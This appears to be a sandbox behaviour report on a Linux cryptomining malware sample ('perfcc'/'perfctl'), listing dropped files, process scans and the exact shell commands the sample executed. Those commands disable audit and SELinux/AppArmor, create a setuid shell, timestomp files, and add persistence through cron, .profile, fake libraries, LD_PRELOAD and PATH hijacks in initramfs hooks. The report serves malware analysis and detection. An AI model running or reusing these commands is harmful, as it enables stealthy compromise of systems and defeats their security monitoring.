Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/lsof	Jump to dropped file

Writes identical ELF files to multiple locations

Source: /tmp/.perf.c/raid5wq (PID: 6269)	File with SHA-256 22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13 written: /usr/bin/perfcc	Jump to dropped file
Source: /usr/bin/cp (PID: 6380)	File with SHA-256 22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13 written: /usr/lib/libfsnldev.so	Jump to dropped file
Source: /usr/bin/cp (PID: 6671)	File with SHA-256 22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13 written: /tmp/.perf.c/gpg-agent	Jump to dropped file
Source: /usr/bin/cp (PID: 6375)	File with SHA-256 22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13 written: /usr/lib/libpprocps.so	Jump to dropped file
Source: /usr/bin/cp (PID: 6265)	File with SHA-256 22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13 written: /tmp/.perf.c/raid5wq	Jump to dropped file

Source: /bin/sh (PID: 6330)	Chmod directory: /usr/bin/chmod -> chmod 4755 /bin/wizlmsh
Source: /bin/sh (PID: 6407)	Chmod directory: /usr/bin/chmod -> chmod 755 /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top

Source: /tmp/perfcc.elf (PID: 6239)	Directory: /tmp/.xdiag	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	Directory: /tmp/.perf.c	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /tmp/.perf.c	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /tmp/.xdiag/int/.e.lock	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /tmp/.xdiag/int/.e.lock	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /tmp/.apid	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /root/.profile	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /tmp/.perf.c	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /dev/shm/.dmesg	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Directory: /bin/.local	Jump to behavior
Source: /usr/bin/sed (PID: 6372)	Directory: /root/.profile
Source: /usr/bin/find (PID: 6421)	Directory: /tmp/.
Source: /usr/bin/find (PID: 6437)	Directory: /tmp/.
Source: /usr/bin/find (PID: 6581)	Directory: /tmp/.
Source: /tmp/.perf.c/perfctl (PID: 6616)	Directory: /root/.xmrig.json
Source: /tmp/.perf.c/perfctl (PID: 6620)	File: /tmp/.apid
Source: /usr/bin/find (PID: 6659)	Directory: /tmp/.
Source: /lib/systemd/systemd-journald (PID: 6485)	File: /run/systemd/journal/streams/.#9:93189KnCufy
Source: /lib/systemd/systemd-journald (PID: 6485)	File: /run/systemd/journal/streams/.#9:93213f9dc5y
Source: /lib/systemd/systemd-journald (PID: 6485)	Directory: /tmp/.apid
Source: /lib/systemd/systemd-journald (PID: 6485)	Directory: /tmp/.apid

Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1582/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1582/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1582/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/3088/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/3088/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/3088/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/230/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/230/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/230/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/110/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/110/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/110/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/231/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/231/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/231/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/111/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/111/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/111/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/232/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/232/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/232/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1579/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1579/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1579/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/112/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/112/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/112/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/233/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/233/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/233/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1699/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1699/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1699/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/113/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/113/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/113/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/234/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/234/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/234/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1335/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1335/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1335/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1698/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1698/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1698/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/114/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/114/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/114/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/235/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/235/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/235/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1334/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1334/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1334/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1576/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1576/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1576/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/2302/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/2302/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/2302/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/115/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/115/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/115/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/236/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/236/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/236/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/116/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/116/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/116/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/237/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/237/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/237/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/117/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/117/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/117/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/118/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/118/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/118/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/910/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/910/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/910/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/910/cmdline	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/119/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/119/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/119/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/912/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/912/comm	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/912/status	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	File opened: /proc/912/cmdline	Jump to behavior

Source: /tmp/perfcc.elf (PID: 6247)	Shell command executed: /bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /tmp/perfcc.elf >/dev/null 2>/dev/null & exit"	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6264)	Shell command executed: /bin/sh -c "cp /proc/6252/exe /tmp/.perf.c/raid5wq && chmod +x /tmp/.perf.c/raid5wq"	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6268)	Shell command executed: /bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;raid5wq -p &"	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6279)	Shell command executed: /bin/sh -c "auditctl -e0"
Source: /tmp/.perf.c/raid5wq (PID: 6280)	Shell command executed: /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
Source: /tmp/.perf.c/raid5wq (PID: 6281)	Shell command executed: /bin/sh -c "setenforce 0"
Source: /tmp/.perf.c/raid5wq (PID: 6308)	Shell command executed: /bin/sh -c "if systemctl status auditd\|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"
Source: /tmp/.perf.c/raid5wq (PID: 6311)	Shell command executed: /bin/sh -c "if systemctl status apparmor\|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"
Source: /tmp/.perf.c/raid5wq (PID: 6329)	Shell command executed: /bin/sh -c "chmod 4755 /bin/wizlmsh"
Source: /tmp/.perf.c/raid5wq (PID: 6334)	Shell command executed: /bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"
Source: /tmp/.perf.c/raid5wq (PID: 6361)	Shell command executed: /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
Source: /tmp/.perf.c/raid5wq (PID: 6366)	Shell command executed: /bin/sh -c "(crontab -l\|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')\|crontab -"
Source: /tmp/.perf.c/raid5wq (PID: 6371)	Shell command executed: /bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"
Source: /tmp/.perf.c/raid5wq (PID: 6374)	Shell command executed: /bin/sh -c "cp /proc/6269/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"
Source: /tmp/.perf.c/raid5wq (PID: 6379)	Shell command executed: /bin/sh -c "cp /proc/6269/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"
Source: /tmp/.perf.c/raid5wq (PID: 6406)	Shell command executed: /bin/sh -c "chmod 755 /bin/.local/bin/;touch -acmr /etc/passwd /bin/.local/bin/"
Source: /tmp/.perf.c/raid5wq (PID: 6409)	Shell command executed: /bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"
Source: /tmp/.perf.c/raid5wq (PID: 6413)	Shell command executed: /bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs\|cat > /tmp/lgctr2 2>&1'"
Source: /tmp/.perf.c/raid5wq (PID: 6417)	Shell command executed: /bin/sh -c "chmod g+s /lib/libgcwrap.so"
Source: /tmp/.perf.c/raid5wq (PID: 6419)	Shell command executed: /bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null\|xargs grep -s -l 'ldd '\|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"
Source: /tmp/.perf.c/raid5wq (PID: 6429)	Shell command executed: /bin/sh -c "systemctl --type=service --state=running\|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald\|awk '{print $1}'\|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"
Source: /tmp/.perf.c/raid5wq (PID: 6430)	Shell command executed: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
Source: /tmp/.perf.c/raid5wq (PID: 6435)	Shell command executed: /bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null\|xargs grep -s -l 'ldd '\|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"
Source: /tmp/.perf.c/raid5wq (PID: 6464)	Shell command executed: /bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"
Source: /tmp/.perf.c/raid5wq (PID: 6499)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6505)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6509)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6514)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6517)	Shell command executed: /bin/sh -c "killall -9 perfctl;pkill -9 perfctl"
Source: /tmp/.perf.c/raid5wq (PID: 6519)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6525)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6545)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6549)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6554)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6558)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6568)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6580)	Shell command executed: /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null\|grep cron\|grep '/root$'\|xargs cat"
Source: /tmp/.perf.c/raid5wq (PID: 6599)	Shell command executed: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
Source: /tmp/.perf.c/raid5wq (PID: 6600)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6605)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6608)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6613)	Shell command executed: /bin/sh -c "PATH=/tmp/.perf.c:$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"
Source: /tmp/.perf.c/raid5wq (PID: 6617)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6626)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6630)	Shell command executed: /bin/sh -c "ps -ax\|grep perfctl\|grep -v grep\|awk '{print $1}'\|xargs kill -9"
Source: /tmp/.perf.c/raid5wq (PID: 6636)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6641)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6645)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6650)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6653)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6658)	Shell command executed: /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null\|grep cron\|grep '/root$'\|xargs cat"
Source: /tmp/.perf.c/raid5wq (PID: 6663)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6669)	Shell command executed: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
Source: /tmp/.perf.c/raid5wq (PID: 6674)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6679)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6689)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6701)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6702)	Shell command executed: /bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"
Source: /tmp/.perf.c/raid5wq (PID: 6708)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6711)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6715)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /tmp/.perf.c/raid5wq (PID: 6721)	Shell command executed: /bin/sh -c "who \| wc -l"
Source: /bin/perfcc (PID: 6490)	Shell command executed: /bin/sh -c "PATH=/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /usr/bin/perfcc >/dev/null 2>/dev/null & exit"
Source: /usr/bin/perfcc (PID: 6670)	Shell command executed: /bin/sh -c "cp /proc/6491/exe /tmp/.perf.c/gpg-agent && chmod +x /tmp/.perf.c/gpg-agent"
Source: /usr/bin/perfcc (PID: 6683)	Shell command executed: /bin/sh -c "PATH=/tmp/.perf.c:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;gpg-agent --supervised &"
Source: /tmp/.perf.c/gpg-agent (PID: 6697)	Shell command executed: /bin/sh -c "auditctl -e0"
Source: /tmp/.perf.c/gpg-agent (PID: 6698)	Shell command executed: /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
Source: /tmp/.perf.c/gpg-agent (PID: 6700)	Shell command executed: /bin/sh -c "setenforce 0"

Source: /bin/sh (PID: 6267)	Chmod executable: /usr/bin/chmod -> chmod +x /tmp/.perf.c/raid5wq	Jump to behavior
Source: /bin/sh (PID: 6330)	Chmod executable: /usr/bin/chmod -> chmod 4755 /bin/wizlmsh
Source: /bin/sh (PID: 6378)	Chmod executable: /usr/bin/chmod -> chmod +x /lib/libpprocps.so
Source: /bin/sh (PID: 6385)	Chmod executable: /usr/bin/chmod -> chmod +x /lib/libfsnldev.so
Source: /bin/sh (PID: 6407)	Chmod executable: /usr/bin/chmod -> chmod 755 /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top
Source: /bin/sh (PID: 6418)	Chmod executable: /usr/bin/chmod -> chmod g+s /lib/libgcwrap.so
Source: /tmp/.perf.c/raid5wq (PID: 6548)	Chmod executable: /usr/bin/chmod -> chmod -R 777 /tmp/.xdiag/data
Source: /bin/sh (PID: 6682)	Chmod executable: /usr/bin/chmod -> chmod +x /tmp/.perf.c/gpg-agent

Source: /bin/sh (PID: 6310)	Grep executable: /usr/bin/grep -> grep -q enabled;
Source: /bin/sh (PID: 6313)	Grep executable: /usr/bin/grep -> grep -q enabled;
Source: /bin/sh (PID: 6370)	Grep executable: /usr/bin/grep -> grep -v -e perfcc -e /tmp/.perf
Source: /bin/bash (PID: 6388)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /bin/bash (PID: 6391)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /bin/bash (PID: 6394)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /bin/bash (PID: 6397)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /bin/bash (PID: 6402)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /bin/bash (PID: 6405)	Grep executable: /usr/bin/grep -> grep -q ABWTRX
Source: /usr/bin/xargs (PID: 6424)	Grep executable: /usr/bin/grep -> grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g
Source: /usr/bin/xargs (PID: 6425)	Grep executable: /usr/bin/grep -> grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot
Source: /bin/sh (PID: 6432)	Grep executable: /usr/bin/grep -> grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald
Source: /usr/bin/xargs (PID: 6440)	Grep executable: /usr/bin/grep -> grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g
